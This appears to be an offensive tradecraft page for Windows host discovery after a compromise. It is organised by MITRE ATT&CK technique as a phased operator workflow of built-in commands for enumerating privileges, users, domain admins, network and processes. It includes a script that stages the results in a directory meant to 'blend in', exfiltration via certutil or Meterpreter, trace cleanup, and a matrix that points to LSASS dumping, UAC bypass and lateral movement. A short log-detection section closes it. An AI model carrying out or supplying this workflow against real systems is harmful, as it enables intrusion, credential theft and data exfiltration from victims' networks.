T1082 / T1033 / T1069: Host Discovery
Covers: T1082 - System Information Discovery, T1033 - System Owner/User Discovery, T1069 - Permission Groups Discovery, T1016 - System Network Configuration Discovery, T1049 - System Network Connections Enumeration, T1057 - Process Discovery, T1012 - Query Registry
Technique Requirementsβ
| Privileges Required | User (most commands) / Administrator (some WMI queries and full process listings) |
| Effective Permissions | Context of the invoking user |
| Employment Complexity | 1/5 - Very Low |
| Detection Complexity | 2/5 - Low (commands are routine; volume and sequence is the tell) |
Backgroundβ
Discovery is the collection of information about the compromised host and its environment. Every technique in this document eventually requires discovery output to proceed - you need to know your privilege level before attempting UAC bypass, the domain structure before lateral movement, and the process list before dumping LSASS.
All commands in this section are built-in Windows utilities. Discovery commands are inherently low-suspicion in isolation; the anomaly is a rapid burst of enumeration commands from a single process within a short window.
Why structure matters: An operator who runs commands randomly wastes time re-querying things they already know and misses context that shapes later decisions. The sections below are organized as a linear workflow - run them in order on every new host.
Workflow: First 10 Minutes on a New Hostβ
The workflow is organized into five phases. Run each phase completely before moving to the next. Key decisions that branch the operation (privilege escalation path, lateral movement target, credential dump method) are called out inline.
Phase 1: Who Am I?β
Establish your identity and privilege level before anything else. This determines whether you can proceed directly to sensitive operations or need to escalate first.
whoami
whoami /priv
whoami /groups
whoami /all
| Output to look for | Implication |
|---|---|
NT AUTHORITY\SYSTEM or NT AUTHORITY\NETWORK SERVICE | Already SYSTEM - skip UAC bypass |
BUILTIN\Administrators in groups | Local admin context; UAC bypass may be needed |
SeDebugPrivilege enabled | Can dump LSASS directly - go to T1003 Credential Dumping |
SeImpersonatePrivilege enabled | Potato attacks possible (not LOL, but note it) |
| Domain user with no admin groups | Need local privesc before most persistence/credential techniques |
Current directory and environment context:
echo %USERNAME% && echo %USERDOMAIN% && echo %COMPUTERNAME%
echo %LOGONSERVER%
echo %USERPROFILE%
set
%LOGONSERVER% tells you which DC authenticated you. If it matches %COMPUTERNAME%, you are the DC - NTDS.dit is accessible locally.
Phase 2: What Is This Machine?β
systeminfo
systeminfo is the single most information-dense command available. Key fields to extract:
| Field | Why it matters |
|---|---|
OS Name / OS Version | Determines which UAC bypass, IFEO, and accessibility feature techniques apply |
Domain | Confirms domain membership; WORKGROUP means local accounts only |
Logon Server | Corroborates %LOGONSERVER% - identify DC |
Hotfix(s) | Gaps in patching indicate exploit opportunities (not LOL, but note them) |
Network Card(s) | Shows all adapters including VPN/internal interfaces not in ipconfig |
Focused queries if systeminfo is slow or noisy:
# OS version only
wmic os get Caption,Version,BuildNumber /value
# Hostname and domain
wmic computersystem get Name,Domain,Manufacturer,Model /value
# Installed hotfixes - look for gaps in the KB list
wmic qfe get HotFixID,InstalledOn /value
Phase 3: Who Else Is Here?β
Local Users and Groupsβ
# All local user accounts
net user
# Details on a specific user (account status, last logon, group membership)
net user <USERNAME>
# All local groups
net localgroup
# Members of the local Administrators group - highest-value targets
net localgroup Administrators
# Remote Desktop Users - who can RDP in
net localgroup "Remote Desktop Users"
Domain Context (if domain-joined)β
# Current domain
net config workstation
# Domain users (if you have connectivity to the DC)
net user /domain
# Domain groups
net group /domain
# Members of Domain Admins - lateral movement targets
net group "Domain Admins" /domain
# Members of Enterprise Admins (forest-wide)
net group "Enterprise Admins" /domain
# Domain controllers in the domain
net group "Domain Controllers" /domain
net user /domain and net group /domain query the DC over LDAP. They work from any domain-joined machine with network access to the DC - no special privileges needed for the queries themselves.
Active Sessionsβ
Who else is currently logged on - other sessions could see your activity:
# Currently logged-in users (interactive sessions)
query user
# All sessions including disconnected RDP
query session
# Net sessions from remote machines (requires admin)
net session
Phase 4: What Does the Network Look Like?β
IP Configurationβ
# Full adapter details - all interfaces, DNS servers
ipconfig /all
# ARP cache - what machines has this host recently talked to?
arp -a
# Current routing table
route print
The ARP cache is gold for lateral movement target identification. Every IP in arp -a is a host this machine recently communicated with - they are likely reachable and trusted.
Active Connectionsβ
# All active TCP/UDP connections with process IDs
netstat -ano
# Same, with executable names (requires admin for other users' processes)
netstat -anob
Map the netstat output to processes:
# Correlate PID from netstat to process name
tasklist /FI "PID eq <PID>"
Key things to look for in netstat -ano:
| Pattern | Implication |
|---|---|
0.0.0.0:445 or 0.0.0.0:139 LISTENING | SMB is open - lateral movement via net use is viable |
0.0.0.0:3389 LISTENING | RDP is enabled - accessible feature backdoor (T1546.008) has remote value |
0.0.0.0:5985 or :5986 LISTENING | WinRM is enabled - PowerShell Remoting lateral movement viable |
| Established connection to an unusual foreign IP | Possible existing C2 or outbound pivot |
DNS and NetBIOS Name Resolutionβ
# DNS suffix search list and registered DNS servers
ipconfig /all | findstr /i "dns\|suffix\|search"
# Flush resolver cache (useful before doing your own lookups)
ipconfig /flushdns
# NetBIOS name table for local machine and network
nbtstat -n
nbtstat -r
Network Sharesβ
# Shares on this machine
net share
# Administrative shares accessible on a remote target (requires credentials)
net view \\<TARGET_IP> /all
Phase 5: What Is Running? What Is Installed?β
Process Listβ
# All running processes with PID and memory usage
tasklist
# Verbose - includes DLLs loaded by each process (large output)
tasklist /v
# Filter by image name
tasklist /FI "IMAGENAME eq lsass.exe"
# Via WMI - includes command-line arguments (more useful for identifying scripts)
wmic process get Name,ProcessId,ParentProcessId,CommandLine /value
Critical process to identify: lsass.exe PID - needed for the LSASS MiniDump procedure.
# Get LSASS PID directly
tasklist /FI "IMAGENAME eq lsass.exe" /FO LIST
Running Servicesβ
# All running services
sc.exe query type= all state= all
# Services with their binary paths - identify hijackable unquoted paths
wmic service get Name,DisplayName,PathName,StartMode,State /value
# Abbreviated service list via net
net start
Parse the wmic service output for Unquoted Service Path candidates: any PathName with spaces that is not enclosed in quotes.
Scheduled Tasksβ
# All scheduled tasks
schtasks /query /fo LIST /v
# Brief output - task name, status, next run time
schtasks /query /fo TABLE
Look for tasks running as SYSTEM with writable script paths - those are hijackable.
Installed Softwareβ
# via WMI - most complete list
wmic product get Name,Version,InstallDate /value
# via registry - faster, includes more entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /v DisplayName
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /v DisplayName
wmic product get triggers a Windows Installer consistency check on some systems and can be slow (30+ seconds). Use the reg query method if speed matters.
Phase 6: Registry and Configuration Intelβ
AutoRun Locations (persistence check)β
# HKLM Run keys - system-wide persistence
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
# HKCU Run keys - current user persistence
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
These show both your own implants (if placed) and any existing persistence from other actors or IT tools.
PowerShell Execution Policyβ
reg query HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell /v ExecutionPolicy
reg query HKCU\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell /v ExecutionPolicy
Restricted or AllSigned means unsigned PS scripts are blocked - use -EncodedCommand or inline execution, or use wscript/mshta instead.
AppLocker Policyβ
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 /s
If this key exists and has subkeys (Exe, Script, Dll, Msi), AppLocker is configured. The presence of rules under Script means .ps1 files may be blocked - shift to signed binary proxy execution (see T1218).
Credential-Related Registry Keysβ
# WDigest - if UseLogonCredential = 1, plaintext passwords cached in LSASS
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
# LSA Protection - if RunAsPPL = 1, LSASS is a protected process; comsvcs MiniDump blocked
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
# Credential Guard
reg query HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity
| Key / Value | Implication |
|---|---|
WDigest\UseLogonCredential = 1 | Plaintext creds in LSASS - pypykatz will show them |
WDigest\UseLogonCredential = 0 or absent | Hashes only from LSASS; use SAM/NTDS.dit instead |
Lsa\RunAsPPL = 1 | LSASS is PPL-protected; comsvcs MiniDump will fail with access denied |
DeviceGuard = 1 | Credential Guard active; LSASS secrets isolated in VSM - no useful dump |
Domain Controller Identificationβ
# If domain-joined, this returns the DC name
nltest /dclist:<DOMAIN>
# DC for the current machine's domain
nltest /dsgetdc:<DOMAIN>
Output Collection Patternβ
For longer enumeration sessions, redirect output to a staging file for exfiltration:
# Create a staging directory that blends in
mkdir C:\Windows\Temp\perf
# Collect all discovery output into a single file
(
echo === WHOAMI /ALL ===
whoami /all
echo === SYSTEMINFO ===
systeminfo
echo === NET USER ===
net user
echo === NET LOCALGROUP ADMINISTRATORS ===
net localgroup Administrators
echo === NET GROUP DOMAIN ADMINS /DOMAIN ===
net group "Domain Admins" /domain
echo === IPCONFIG /ALL ===
ipconfig /all
echo === ARP -A ===
arp -a
echo === NETSTAT -ANO ===
netstat -ano
echo === TASKLIST ===
tasklist
echo === WMIC PROCESS ===
wmic process get Name,ProcessId,ParentProcessId,CommandLine /value
echo === SCHTASKS ===
schtasks /query /fo LIST /v
echo === SERVICES ===
wmic service get Name,DisplayName,PathName,StartMode,State /value
echo === AUTORUN HKLM ===
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
echo === AUTORUN HKCU ===
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
) > C:\Windows\Temp\perf\sys.txt 2>&1
Exfiltrate via certutil -encode + copy, or leave for pickup via your Meterpreter session:
# Via Meterpreter:
# meterpreter > download C:\\Windows\\Temp\\perf\\sys.txt /tmp/
# Cleanup after retrieval:
del C:\Windows\Temp\perf\sys.txt
rmdir C:\Windows\Temp\perf
Decision Matrix: Where Do You Go Next?β
After running this workflow, your outputs map directly to the next technique to execute:
| Discovery Finding | Next Step |
|---|---|
Running as SYSTEM or SeDebugPrivilege enabled | T1003 - Dump LSASS directly |
| Local Admin, no SYSTEM; UAC present | T1548 - Bypass UAC first |
Unquoted service path found in wmic service | T1574.009 - Unquoted Service Path |
WDigest\UseLogonCredential = 0; LSASS not worth dumping | T1003 - SAM/SYSTEM hive export instead |
Lsa\RunAsPPL = 1 | LSASS dump blocked; pivot to SAM/NTDS path |
| ARP cache shows reachable hosts; SMB open | T1021 - Lateral Movement |
| AppLocker rules on Script/Exe | T1218 - Signed Binary Proxy Execution |
This machine is a DC (%LOGONSERVER% == %COMPUTERNAME%) | T1003.003 - NTDS.dit via Shadow Copy |
| No admin rights at all | Establish persistence as current user; await elevated trigger |
Log Detectionβ
- Source:
Microsoft-Windows-Sysmon/Operational- EventID:
1(ProcessCreate)- Rapid sequence of
whoami,net,wmic,systeminfo,ipconfig,arp,netstat,reg queryfrom the same parent PID within a short window - individually benign, collectively anomalous wmic process get ... CommandLine- rarely run interactively by legitimate usersnet group "Domain Admins" /domain- uncommon outside IT admin context
- Rapid sequence of
- EventID:
- Source:
Security- EventID:
4688(Process creation with command line auditing enabled)- Same patterns as above
- EventID:
- Source:
Microsoft-Windows-PowerShell/Operational- EventID:
4104(Script block logging)- Any PS-based enumeration will appear here if script block logging is enabled
- EventID: